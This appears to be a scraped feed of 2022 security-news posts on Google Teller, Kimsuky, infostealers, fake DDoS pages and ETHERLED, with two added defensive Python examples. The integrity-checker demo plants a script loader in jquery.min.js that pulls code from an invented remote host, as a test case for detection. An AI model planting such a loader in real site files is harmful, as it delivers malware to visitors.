	Whenever a site or the browser makes a connection to Google to send data packets to the company, the extension gives you an audio cue; this happens when you type in the address or search bar, on page load, when you move the mouse over elements on a webpage, and also after the initial site load in the browser. Some sites refresh advertisements at intervals, which usually means new connections to advertising servers on the Internet.
</p>

<p>
	 
</p>

<p>
	Most of the time, when you hear a beep while moving the mouse over an element on the site, it is a connection to Google Analytics that is established. Many sites use Google Analytics to track website visits, how a website is used, and website errors.
</p>

<p>
	 
</p>

<p>
	Hubert notes that the address ranges used by Google Cloud customers are excluded by the extension, so sites that are simply hosted on Google Cloud are not counted, but that other connections to major Google sites and servers are covered. The IP addresses <a data-wpel-link="external" href="https://support.google.com/a/answer/10026322?hl=en" rel="external nofollow" target="_blank">were taken</a> from an official Google support page listing them.
</p>
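
<p>
	The matching step behind each beep, as an added example in Python rather than the extension's own JavaScript. Google publishes its address space as JSON at https://www.gstatic.com/ipranges/goog.json and the subset allocated to Google Cloud customers at https://www.gstatic.com/ipranges/cloud.json (both linked from the support page above); classifying a destination as being in goog.json but not in cloud.json is one way to get the "Google itself, not a site hosted on Google Cloud" distinction the article describes. The prefixes embedded below are constructed documentation ranges in the same JSON shape, not the real feeds, and the destination list is made up.
</p>

```python
"""Classify connection destinations against Google's published IP ranges
(added example, not the Google Teller extension's own code).

Download goog.json and cloud.json and pass their text to load_prefixes() for
real use; the feeds embedded below are constructed stand-ins.
"""
import ipaddress
import json
from collections import Counter
from typing import Iterable, List, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def load_prefixes(feed_json: str) -> List[Network]:
    """Parse a goog.json / cloud.json style document into network objects."""
    nets: List[Network] = []
    for entry in json.loads(feed_json)["prefixes"]:
        prefix = entry.get("ipv4Prefix") or entry.get("ipv6Prefix")
        if prefix:
            nets.append(ipaddress.ip_network(prefix, strict=False))
    return nets


def classify(ip: str, google: List[Network], cloud: List[Network]) -> str:
    """'google' for Google's own services, 'google-cloud' for customer-hosted
    ranges, 'other' for everything else. Cloud is tested first because its
    prefixes sit inside the broader goog.json space. A v4 address is never
    'in' a v6 network, so mixed feeds need no special handling."""
    addr = ipaddress.ip_address(ip)
    if any(addr in n for n in cloud):
        return "google-cloud"
    if any(addr in n for n in google):
        return "google"
    return "other"


def tally(destinations: Iterable[str], google: List[Network], cloud: List[Network]) -> Counter:
    """Count a browsing session's connections per class (the beeps, in aggregate)."""
    return Counter(classify(ip, google, cloud) for ip in destinations)


# Constructed feeds using documentation prefixes (RFC 5737 / RFC 3849), not Google's.
GOOG_JSON = json.dumps({"prefixes": [
    {"ipv4Prefix": "198.51.100.0/24"},
    {"ipv6Prefix": "2001:db8:1::/48"},
]})
CLOUD_JSON = json.dumps({"prefixes": [
    {"ipv4Prefix": "198.51.100.128/25"},
]})
GOOGLE_NETS = load_prefixes(GOOG_JSON)
CLOUD_NETS = load_prefixes(CLOUD_JSON)

# Constructed destination list, as a connection log or a webRequest hook would yield it.
SAMPLE_DESTINATIONS = ["198.51.100.5", "198.51.100.200", "192.0.2.44",
                       "2001:db8:1::beef", "198.51.100.7"]

if __name__ == "__main__":
    for ip in SAMPLE_DESTINATIONS:
        print(ip, classify(ip, GOOGLE_NETS, CLOUD_NETS))
    print(tally(SAMPLE_DESTINATIONS, GOOGLE_NETS, CLOUD_NETS))
```

<p>
	The linear scan over the prefix list is adequate for the few hundred entries in the real feeds; a browser extension doing this per request would typically pre-sort the prefixes or use a radix tree, but the classification logic is the same.
</p>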

<p>
	 
</p>

<p>
	A visit to YouTube, one of Google's main properties, creates a near endless stream of audio cues. Testing the extension on Google's own sites may be a bit unfair, but most sites that you visit during regular browsing sessions submit data to Google in one way or another.
</p>

<p>
	 
</p>

<p>
	The extension does not reveal which data is submitted. Not all connections are necessarily tracking-related, but with each one Google gets information about the user and the browser or site the connection originated from.
</p>

<p>
	 
</p>

<p>
	Some sites become unusable when the extension is enabled; this is the case for YouTube, which connects to Google servers constantly. The extension has no option to exclude certain properties, which would help with that.
</p>

<h3>
	Closing Words
</h3>

<p>
	Google Teller is a smart extension that may serve as a wake-up call for Internet users. It could be extended with Facebook, Amazon and Microsoft servers to highlight the involvement of these companies on the Internet.
</p>

<p>
	 
</p>

<p>
	It is in need of an exceptions list and maybe a toggle to turn it on or off easily.
</p>

<p>
	 
</p>

<p>
	<strong>Now You:</strong> What is your take on Google Teller?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2022/08/25/google-teller-browser-makes-a-noise-whenever-google-gets-data/" rel="external nofollow">Google Teller: browser makes a noise whenever Google gets data</a>
</p>
]]></description><guid isPermaLink="false">7949</guid><pubDate>Thu, 25 Aug 2022 19:24:54 +0000</pubDate></item><item><title>Build 25188 driver suggests Microsoft may be improving Windows 11 security</title><link>https://nsaneforums.com/news/security-privacy-news/build-25188-driver-suggests-microsoft-may-be-improving-windows-11-security-r7948/</link><description><![CDATA[<p>
	<img alt="1661410968_secure_boot_windows_11_story." class="ipsImage" data-ratio="59.31" height="405" width="720" src="https://cdn.neow.in/news/images/uploaded/2022/08/1661410968_secure_boot_windows_11_story.jpg">
</p>

<p>
	 
</p>

<p>
	Earlier today, Microsoft released multiple Windows 11 Insider builds, <a href="https://www.neowin.net/news/windows-11-beta-build-22622586-kb5016701-fixes-dwm-explorer-issues-and-more/" rel="external nofollow">two on the Beta Channel (KB5016701)</a> and one for the Dev. The new Dev Channel build 25188 brings many new features and improvements that Microsoft has outlined in the <a href="https://www.neowin.net/news/windows-11-dev-build-25188-has-default-terminal-more-legacy-settings-moved-over/" rel="external nofollow">changelog for the build</a>.
</p>

<p>
	 
</p>

<p>
	And although it is not mentioned there, it looks like the company may have made some enhancements to Windows 11 security. Spotted by Twitter user and leakster Xeno, an updated driver for Microsoft Security Core Boot (msseccore.sys) is present inside. The driver carries version number 10.0.25188.1000, which matches the build number and indicates it was rebuilt for the <a href="https://www.neowin.net/news/windows-11-dev-build-25188-has-default-terminal-more-legacy-settings-moved-over/" rel="external nofollow">latest build</a>.
</p>

<p>
	 
</p>

<p>
	<img alt="1661410549_new_secure_core_boot_driver_b" class="ipsImage" data-ratio="89.55" height="540" width="408" src="https://cdn.neow.in/news/images/uploaded/2022/08/1661410549_new_secure_core_boot_driver_build_25188_(source-_xeno_twitter).jpg">
</p>

<p>
	 
</p>


<p>
	Although we cannot confirm what changes have been made within the driver, it is possible that the many UEFI and Secure Boot vulnerabilities that have surfaced recently prompted Microsoft to harden the boot process further.
</p>

<p>
	 
</p>

<p>
	Back in February, firmware from Microsoft, Intel, and other companies was found vulnerable to <a href="https://www.neowin.net/news/uefi-firmware-from-microsoft-intel-and-more-at-risk-from-nearly-two-dozen-threats/" rel="external nofollow">nearly two dozen threats</a>. Later in April, several Lenovo notebook models were affected by a security issue that <a href="https://www.neowin.net/news/eset-found-lenovo-ideapad-legion-and-more-laptops-had-vulnerable-uefi-security-patches-out/" rel="external nofollow">allowed threat actors to alter Secure Boot settings</a>. And most recently, systems were found susceptible to the GRUB BootHole flaw, though Microsoft has already addressed the issue with its <a href="https://www.neowin.net/news/kb5012170-microsoft-august-patch-tuesday-fixes-critical-secure-boot-grub-vulnerability/" rel="external nofollow">KB5012170 update</a>.
</p>

<p>
	 
</p>

<p>
	The company had also promised <a href="https://www.neowin.net/news/microsoft-promises-its-focusing-on-improving-windows-11-performance-come-2022/" rel="external nofollow">better performance on Windows 11 in 2022</a>, so this could be part of that effort too.
</p>

<p>
	 
</p>

<p>
	Source and image: Xeno (<a href="https://twitter.com/XenoPanther/status/1562490202735513605" rel="external nofollow">Twitter</a>)
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/build-25188-driver-suggests-microsoft-may-be-improving-windows-11-security/" rel="external nofollow">Build 25188 driver suggests Microsoft may be improving Windows 11 security</a>
</p>
]]></description><guid isPermaLink="false">7948</guid><pubDate>Thu, 25 Aug 2022 19:23:34 +0000</pubDate></item><item><title>Apple Collects the Least Amount of User Data Out of Major Tech Companies, Study Suggests</title><link>https://nsaneforums.com/news/security-privacy-news/apple-collects-the-least-amount-of-user-data-out-of-major-tech-companies-study-suggests-r7931/</link><description><![CDATA[<p>
	<span style="font-size:16px;">A new analysis has found that out of the major tech giants, Apple collects the least private user data, with Google, Twitter, Amazon, and Facebook collecting much more data from their users than the iPhone maker.</span>
</p>

<p>
	 
</p>

<p>
	The study measured how many data points each company collects from its users. The study found that Google topped the list, collecting a total of 39 data points for each of its users. Twitter and Amazon follow by collecting 24 and 23 data points for each user, respectively.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="data-big-companies-study.jpeg?lossy" class="ipsImage" data-ratio="75.10" height="540" width="554" src="https://images.macrumors.com/t/oh2BjasIUhyfbKMGHtLYbTFr0Ng=/800x0/article-new/2022/08/data-big-companies-study.jpeg?lossy" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	Possibly surprising to some, Facebook, known for its appetite for user tracking, comes close to Apple, collecting only 14 data points per user. Apple is at the bottom of the list and collects just 12 data points per user, according to the study. Apple, unlike Google, relies much more heavily on on-device machine learning and algorithms for personalization features, such as personalized music recommendations in Apple Music and curated photos in Photos.
</p>

<p>
	<br />
	While Apple collects the least user data, it is also making it harder for other companies, such as Google and Facebook, to collect data from iPhone users. Apple announced App Tracking Transparency (ATT) in 2020 and began enforcing it with iOS 14.5 in 2021; it is a prompt that offers users the choice of whether they wish to be tracked across apps and websites owned by other companies. Facebook has vehemently spoken out against ATT, and details last year revealed the prompt could have cost social media companies $10 billion in revenue for 2021.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.macrumors.com/2022/08/25/apple-least-data-major-tech-companies/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7931</guid><pubDate>Thu, 25 Aug 2022 12:50:58 +0000</pubDate></item><item><title>Researchers Uncover Kimsuky Infra Targeting South Korean Politicians and Diplomats</title><link>https://nsaneforums.com/news/security-privacy-news/researchers-uncover-kimusky-infra-targeting-south-korean-politicians-and-diplomats-r7930/</link><description><![CDATA[<p>
	The North Korean nation-state group Kimsuky has been linked to a new set of malicious activities directed against political and diplomatic entities located in its southern counterpart in early 2022.
</p>

<p>
	<br />
	Russian cybersecurity firm Kaspersky codenamed the cluster GoldDragon, with the infection chains leading to the deployment of Windows malware designed to collect file listings, user keystrokes, and stored web browser login credentials.
</p>

<p>
	<br />
	Included among the potential victims are South Korean university professors, think tank researchers, and government officials.
</p>

<p>
	<br />
	Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, is the name given to a prolific North Korean advanced persistent threat (APT) group that targets entities globally, but with a primary focus on South Korea, to gain intelligence on various topics of interest to the regime.
</p>

<p>
	<br />
	Known to be operating since 2012, the group has a history of employing social engineering tactics, spear-phishing, and watering hole attacks to exfiltrate desired information from victims.
</p>

<p>
	<br />
	Late last month, cybersecurity firm Volexity attributed to the actor an intelligence-gathering operation designed to siphon email content from Gmail and AOL via a malicious Chrome browser extension dubbed Sharpext.
</p>

<p>
	<br />
	The latest campaign follows a similar modus operandi wherein the attack sequence is initiated via spear-phishing messages containing macro-embedded Microsoft Word documents that purportedly feature content related to geopolitical issues in the region.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="cc.jpg" class="ipsImage" data-ratio="55.42" height="394" width="720" src="https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj7-Azj-guMryV4QTU326GOcpsfRHiS5VWG44NpNbVZkJ7V9F6rNDLGZHcygX-CjdVkTSSPb_D5EKQVxgV9mNHt_p-bWKt6rMU-PE7v4eFmz-rhZic6nKDSYJ28gpx-HoBsLiVKhIVcEMHU9wn2Q1aiyjFhbs2AvtkaRcVWbU250D8On3Al2_NwFuhj/s728-e1000/cc.jpg" />
</p>

<p>
	 
</p>

<p>
	Alternative initial access routes are also said to take advantage of HTML Application (HTA) and Compiled HTML Help (CHM) files as decoys to compromise the system.
</p>

<p>
	<br />
	Regardless of the method used, the initial access is followed by the download of a Visual Basic Script from a remote server, which fingerprints the machine and retrieves additional payloads, including an executable capable of exfiltrating sensitive information.
</p>

<p>
	<br />
	What's novel about the attack is the transmission of the victim's email address to the command-and-control (C2) server when the recipient clicks a link in the email to download additional documents. If the request doesn't contain an expected email address, a benign document is returned.
</p>

<p>
	<br />
	To further complicate the kill chain, the first-stage C2 server forwards the victim's IP address to a second server that hosts the VBScript, which then compares it with the incoming request generated after the target opens the lure document.
</p>

<p>
	<br />
	This "victim verification" across the two C2 servers ensures that the VBScript is delivered only when the IP address checks succeed, indicating a highly targeted approach.
</p>

<p>
	<br />
	"The Kimsuky group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis," Kaspersky researcher Seongsu Park said. "The main difficulty in tracking this group is that it's tough to acquire a full-infection chain."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2022/08/researchers-uncover-kimusky-infra.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7930</guid><pubDate>Thu, 25 Aug 2022 12:44:05 +0000</pubDate></item><item><title>Here's another good reason not to download pirated software</title><link>https://nsaneforums.com/news/security-privacy-news/heres-another-good-reason-not-to-download-pirated-software-r7925/</link><description><![CDATA[<p>
	If you ever needed a compelling argument against downloading pirated software, cracks, or activators, here’s one - you’ll probably end up with a dangerous infostealer along the way, too.
</p>

<p>
	 
</p>

<p>
	Experts from Zscaler recently analyzed several ongoing malware distribution campaigns and found that an unknown threat actor (or multiple actors) is using SEO poisoning techniques to push their websites high up Google's results pages for popular software-related queries such as Adobe Acrobat Pro, 7-Data Recovery Suite, and several other programs.
</p>

<p>
	<br />
	These websites, most often on .com domains, but also appearing on less popular domains such as .xyz, or .cfd, claim to be hosting these programs (and others), as well as cracks, activators, or anything else that’s needed in order to get a commercial (and expensive) program to work - for free.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:20px;"><strong>RedLine Stealer or RecordBreaker</strong></span>
</p>

<p>
	 
</p>

<p>
	What the victims actually download onto their endpoints, however, is not the program in question but dangerous infostealing malware, such as RedLine Stealer or RecordBreaker. These types of malware are capable of all kinds of nasties, from stealing passwords stored in browsers to stealing payment data to grabbing screenshots.
</p>

<p>
	<br />
	The best way to protect against these attacks, the researchers say, is to refrain from downloading pirated software in the first place, along with any cracks, keygens, activators, or anything of the sort.
</p>

<p>
	<br />
	Furthermore, users can protect their endpoints by installing an antivirus or anti-malware service, as well as a firewall. Finally, setting up two-factor authentication on as many accounts as possible makes it much harder for threat actors to take over those accounts even if they obtain the login credentials, although infostealers of this class also harvest browser session cookies, which can let an attacker reuse an already-authenticated session without ever seeing the second-factor prompt.
</p>

<p>
	<br />
	Also, it is important to note that just because a website pops up high on Google’s search engine results page (or any other search engine’s, for that matter), that doesn’t mean that it’s legitimate and that users should trust it by default.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.msn.com/en-us/news/technology/heres-another-good-reason-not-to-download-pirated-software/ar-AA1140Bz" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7925</guid><pubDate>Wed, 24 Aug 2022 22:11:23 +0000</pubDate></item><item><title>Avast launches Ransomware Shield to fight growing threats to businesses</title><link>https://nsaneforums.com/news/security-privacy-news/avast-launches-ransomware-shield-to-fight-growing-threats-to-businesses-r7900/</link><description><![CDATA[<p>
	Avast has announced the launch of Ransomware Shield for Avast Essential, Premium, and Ultimate Business Security for businesses on Windows and macOS. It's designed to help organizations stay safe against ransomware attacks, which encrypt files and demand a ransom to have them unlocked.
</p>

<p>
	<br />
	According to Avast, ransomware attacks declined during Q4 2021 and Q1 2022 but began rising again in the second quarter of this year. Specifically, Ransomware Shield safeguards files and folders from being modified, deleted, or encrypted by unknown applications. Admins will be able to choose which applications have permission to access the protected files, preventing ransomware from causing havoc.
</p>

<p>
	<br />
	Commenting on the new Ransomware Shield, Filip Hlinka, VP of Product, Avast Business, said:
</p>

<p style="margin-left:40px;">
	<br />
	<em> “Small businesses are facing a growing threat from ransomware, with cybercriminals increasingly targeting smaller organizations to encrypt crucial business data and disrupt operations. The results can be devastating for small businesses that lack the financial and technical resources to rebound from such attacks. Avast's antivirus has always offered consumers and business users powerful protection against cyberthreats including ransomware, and Ransomware Shield offers a purpose-built, additional layer of protection which helps to secure businesses' most crucial files against these highly damaging attacks.”</em>
</p>

<p>
	<br />
	With Avast, businesses already had some protection against ransomware with a comprehensive set of tools including Web Shield, File Shield, and Behavior Shield. The new Ransomware Shield will complement these to strengthen security. The feature is now enabled by default, and the list of protected files and folders can be edited in the Avast Business Hub.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.neowin.net/news/avast-launches-ransomware-shield-to-fight-growing-threats-to-businesses/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7900</guid><pubDate>Wed, 24 Aug 2022 13:13:12 +0000</pubDate></item><item><title>Hackers Using Fake DDoS Protection Pages to Distribute Malware</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-using-fake-ddos-protection-pages-to-distribute-malware-r7898/</link><description><![CDATA[<p>
	WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer.
</p>

<p>
	<br />
	"A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevent prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week.
</p>

<p>
	<br />
	Distributed denial-of-service (DDoS) protection pages are the browser verification checks many sites use to deter bot-driven unwanted and malicious traffic from eating up bandwidth and taking down websites.
</p>

<p>
	<br />
	The new attack vector involves hijacking WordPress sites to display fake DDoS protection pop-ups that, when clicked, ultimately lead to the download of a malicious ISO file ("security_install.iso") to the victim's systems.
</p>

<p>
	<br />
	This is achieved by injecting three lines of code into a JavaScript file ("jquery.min.js"), or alternatively into the active theme file of the website, which, in turn, loads heavily obfuscated JavaScript from a remote server.
</p>

<p>
	<br />
	"This JavaScript then communicates with a second malicious domain which loads more JavaScript that initiates the download prompt for the malicious .iso file," Martin explained.
</p>

<p>
	<br />
	Following the download, users are prompted to enter a verification code supposedly generated by a "DDoS Guard" application, which entices the victim into opening the weaponized installer in order to reach the destination website.
</p>

<p>
	<br />
	While the installer does display a verification code to maintain the ruse, in reality, the file is a remote access trojan called NetSupport RAT, which is linked to the FakeUpdates (aka SocGholish) malware family and also covertly installs Raccoon Stealer, a credential-stealing trojan available for rent on underground forums.
</p>

<p>
	<br />
	The development is a sign that attackers are opportunistically co-opting these familiar security mechanisms in their own campaigns in a bid to trick unsuspecting website visitors into installing malware.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="cyber.jpg" class="ipsImage" data-ratio="56.39" height="401" width="720" src="https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjJR5993IU6JINOzz2jewEulZ3Q3im8q5fldw9WgnuuU0EvVUwksCh82cY8YTZfK_PTtH4LHvoi3MW205vJ_0ODGHrKi0fbW9y9NmFNK4cBaXvI7PSXsifQrZErSfkzN7WB8mkuq15jA8I26dNXlD_9ec_f-IXT_GCCDOs9nxgKgtm9U_uG1HYaoDwT/s728-e1000/cyber.jpg" />
</p>

<p style="text-align:center;">
	 
</p>

<p>
	To mitigate such threats, website owners are advised to place their sites behind a web application firewall, employ file integrity checks, and enforce two-factor authentication (2FA). Website visitors are also urged to turn on 2FA, avoid opening suspicious files, and use a script blocker in the browser to prevent the execution of JavaScript.
</p>
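
<p>
	The file integrity check recommended above, as an added example (not Sucuri's tooling or the article's code). A baseline of SHA-256 hashes is taken on a known-clean deploy; a later pass diffs the tree and, for each modified or added file, lists the hosts its script src assignments point at, so an edit of the kind described earlier (a few lines appended to jquery.min.js that pull a second-stage script from another domain) surfaces as "modified, and now loads from a host that is not ours". The hash diff is the reliable signal; the host scan only catches unobfuscated URLs and exists to prioritise what to open first. The demo site is constructed in a temporary directory and the injected lines and host name are invented.
</p>

```python
"""Baseline-and-diff file integrity check for a web root, with a triage pass for
injected remote script loaders (added example, not the article's or Sucuri's code).
"""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Set, Tuple

# src="//host/..." or x.src='https://host/...': capture the host only.
_REMOTE_SRC = re.compile(r"""\bsrc\s*=\s*["'](?:https?:)?//([A-Za-z0-9.-]+)""")


def hash_tree(root: Path) -> Dict[str, str]:
    """Map each file's path (relative to root) to its SHA-256 hex digest."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
    }


def external_hosts(text: str, own_hosts: Set[str]) -> List[str]:
    """Hosts referenced by script src assignments that are not in own_hosts."""
    found = {h.lower() for h in _REMOTE_SRC.findall(text)}
    return sorted(found - {h.lower() for h in own_hosts})


def review_changes(root: Path, baseline: Dict[str, str], own_hosts: Set[str]) -> List[Tuple[str, List[str]]]:
    """For every modified or added file, report the foreign hosts it would load script from."""
    changes = diff_manifests(baseline, hash_tree(root))
    report = []
    for rel in changes["modified"] + changes["added"]:
        text = (root / rel).read_text(errors="replace")
        report.append((rel, external_hosts(text, own_hosts)))
    return report


# --- constructed demo site ---------------------------------------------------
def build_demo_site(root: Path) -> None:
    js = root / "wp-includes" / "js" / "jquery"
    js.mkdir(parents=True)
    (js / "jquery.min.js").write_text("/*! jQuery v3.6.0 (constructed stub) */\n"
                                      "window.jQuery=function(){};\n")
    theme = root / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    (theme / "functions.php").write_text("<?php\nwp_enqueue_script('main', '/wp-content/themes/demo/main.js');\n")


def inject_loader(root: Path) -> None:
    """Mimic the injection pattern the article describes: a short appended stub
    that pulls further code from a remote host (host name invented, .invalid TLD)."""
    target = root / "wp-includes" / "js" / "jquery" / "jquery.min.js"
    with target.open("a") as fh:
        fh.write("var s=document.createElement('script');\n"
                 "s.src='https://cdn-ddos-check.invalid/x.js';\n"
                 "document.head.appendChild(s);\n")


def demo() -> List[Tuple[str, List[str]]]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_demo_site(root)
        baseline = hash_tree(root)          # taken on the known-clean deploy
        inject_loader(root)                 # ... later, the compromise happens
        return review_changes(root, baseline, {"www.example.com"})


if __name__ == "__main__":
    for path, hosts in demo():
        print(f"{path}: changed; loads script from {hosts or 'no foreign host'}")
```

<p>
	In practice the baseline manifest is stored off the web server (an attacker who can edit jquery.min.js can edit a manifest sitting next to it), and the diff runs from a cron job or a CI step after each deploy.
</p>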

<p>
	<br />
	"The infected computer could be used to pilfer social media or banking credentials, detonate ransomware, or even entrap the victim into a nefarious 'slave' network, extort the computer owner, and violate their privacy — all depending on what the attackers decide to do with the compromised device," Martin said.
</p>

<p>
	<br />
	This isn't the first time ISO-themed files and CAPTCHA checks have been used to deliver the NetSupport RAT.
</p>

<p>
	<br />
	In April 2022, eSentire disclosed an attack chain that leveraged a fake Chrome installer to deploy the trojan, which then paved the way for the execution of Mars Stealer. Likewise, an IRS-themed phishing campaign detailed by Cofense and Walmart Global Tech involved utilizing fake CAPTCHA puzzles on websites to deliver the same malware.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2022/08/hackers-using-fake-ddos-protection.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">7898</guid><pubDate>Wed, 24 Aug 2022 12:58:24 +0000</pubDate></item><item><title>ETHERLED: Air-gapped systems leak data via network card LEDs</title><link>https://nsaneforums.com/news/security-privacy-news/etherled-air-gapped-systems-leak-data-via-network-card-leds-r7887/</link><description><![CDATA[<p>
	Israeli researcher Mordechai Guri has discovered a new method to exfiltrate data from air-gapped systems using the LED indicators on network cards. Dubbed 'ETHERLED', the method turns the blinking lights into Morse code signals that can be decoded by an attacker.
</p>

<p>
	 
</p>

<p>
	Capturing the signals requires a camera with a direct line of sight to the LEDs on the air-gapped computer's network card. The blinks can then be translated back into binary data to recover the stolen information.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="attack-diagram(3).png" class="ipsImage" data-ratio="47.50" height="212" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/attack-diagram(3).png">
	</p>

	<div>
		<em>ETHERLED attack diagram (arxiv.org)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	Air-gapped systems are computers typically found in highly-sensitive environments (e.g. critical infrastructure, weapon control units) that are isolated from the public internet for security reasons.
</p>

<p>
	 
</p>

<p>
	However, these systems work in air-gapped networks and still use a network card. If an intruder infects them with specially crafted malware, they could replace the card driver with a version that modifies the LED color and blinking frequency to send waves of encoded data, Mordechai Guri has found.
</p>

<p>
	 
</p>

<p>
	The ETHERLED method can work with other peripherals or hardware that use LEDs as status or operational indicators like routers, network-attached storage (NAS) devices, printers, scanners, and various other connected devices.
</p>

<p>
	 
</p>

<p>
	Compared to previously disclosed data exfiltration methods based on optical emanation that take control of LEDs in <a href="https://ieeexplore.ieee.org/document/8754078" rel="external nofollow" target="_blank">keyboards</a> and <a href="https://ieeexplore.ieee.org/abstract/document/8753035" rel="external nofollow" target="_blank">modems</a>, <a href="https://arxiv.org/pdf/2208.09975.pdf" rel="external nofollow" target="_blank">ETHERLED</a> is a more covert approach and less likely to raise suspicion.
</p>

<h2>
	ETHERLED details
</h2>

<p>
	The attack begins with planting malware on the target computer that contains a modified version of the network card's firmware. This allows taking control of the LED blinking frequency, duration, and color.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="code-to-control.png" class="ipsImage" data-ratio="75.21" height="443" width="589" src="https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/code-to-control.png">
	</p>

	<div>
		<em>Code to control LED indicators (arxiv.org)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	Alternatively, the malware can directly attack the driver for the network interface controller (NIC) to change the connectivity status or to modulate the LEDs as required to generate the signals.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="three-attack-methods.png" class="ipsImage" data-ratio="65.69" height="358" width="545" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/three-attack-methods.png">
	</p>

	<div>
		<em>The three potential attack methods (arxiv.org)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	The researcher found that the malicious driver can exploit documented or undocumented hardware functionality to fiddle with network connection speeds and to enable or disable the Ethernet interface, resulting in light blinks and color changes.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="transmission-of-signals.png" class="ipsImage" data-ratio="102.27" height="540" width="420" src="https://www.bleepstatic.com/images/news/u/1220909/Security/transmission-of-signals.png">
	</p>

	<div>
		<em>Network card indicators lighting up to convey signals (arxiv.org)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	Guri's tests show that each data frame begins with the sequence '1010' to mark its start, followed by a 64-bit payload.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="signal-packets.png" class="ipsImage" data-ratio="31.07" height="151" width="486" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/signal-packets.png">
	</p>

	<div>
		<em>Signal contents (arxiv.org)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	For data exfiltration through single status LEDs, Morse code dots and dashes lasting between 100 ms and 300 ms were generated, separated by indicator deactivation spaces between 100 ms and 700 ms.
</p>

<p>
	 
</p>

<p>
	The bitrate of the Morse code can be increased by up to ten times (10 ms dots, 30 ms dashes, and 10-70 ms spaces) when using the driver/firmware attack method.
</p>

<p>
	 
</p>

<p>
	To capture the signals remotely, threat actors can use anything from smartphone cameras (up to 30 meters), drones (up to 50m), hacked webcams (10m), hacked surveillance cameras (30m), and telescopes or cameras with  telephoto or superzoom lenses (over 100 meters).
</p>

<p>
	 
</p>

<p>
	The time needed to leak secrets such as passwords through ETHERLED ranges between 1 second and 1.5 minutes, depending on the attack method used, 2.5 sec to 4.2 minutes for private Bitcoin keys, and 42 seconds to an hour for 4096-bit RSA keys.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="times.png" class="ipsImage" data-ratio="93.54" height="507" width="542" src="https://www.bleepstatic.com/images/news/u/1220909/Tables/times.png">
	</p>

	<div>
		<em>Times required to transmit secrets (arxiv.org)</em>
	</div>
</div>

<h2>
	Other exfiltration channels
</h2>

<p>
	Guri also published a paper on '<a href="https://arxiv.org/pdf/2208.09764.pdf" rel="external nofollow" target="_blank">GAIROSCOPE</a>', an attack on air-gapped systems relying on the generation of resonance frequencies on the target system, captured by a nearby (up to 6 meters) smartphone's gyroscope sensor.
</p>

<p>
	 
</p>

<div class="ipsEmbeddedVideo" contenteditable="false">
	<div>
		<iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="113" src="https://nsaneforums.com/applications/core/interface/index.html" title="GAIROSCOPE: Injecting Data from Air-Gapped Computers to Nearby Gyroscopes" width="200" data-embed-src="https://www.youtube.com/embed/5sUQ0jG01dw?feature=oembed"></iframe>
	</div>
</div>

<p>
	 
</p>

<p>
	In July, the same researcher presented the <a href="https://www.bleepingcomputer.com/news/security/air-gapped-systems-leak-data-via-sata-cable-wifi-antennas/" target="_blank" rel="external nofollow">'SATAn' attack</a>, which uses SATA cables inside computers as antennas, generating data-carrying electromagnetic waves that can be captured by nearby (up to 1.2 meters) laptops.
</p>

<p>
	 
</p>

<p>
	The complete collection of Dr. Mordechai Guri's air-gap covert channel methods can be found in <a href="https://cyber.bgu.ac.il/advanced-cyber/airgap" rel="external nofollow" target="_blank">a dedicated section</a> on the Ben-Gurion University of the Negev website.
</p>

<p>
	 
</p>

<p>
	 
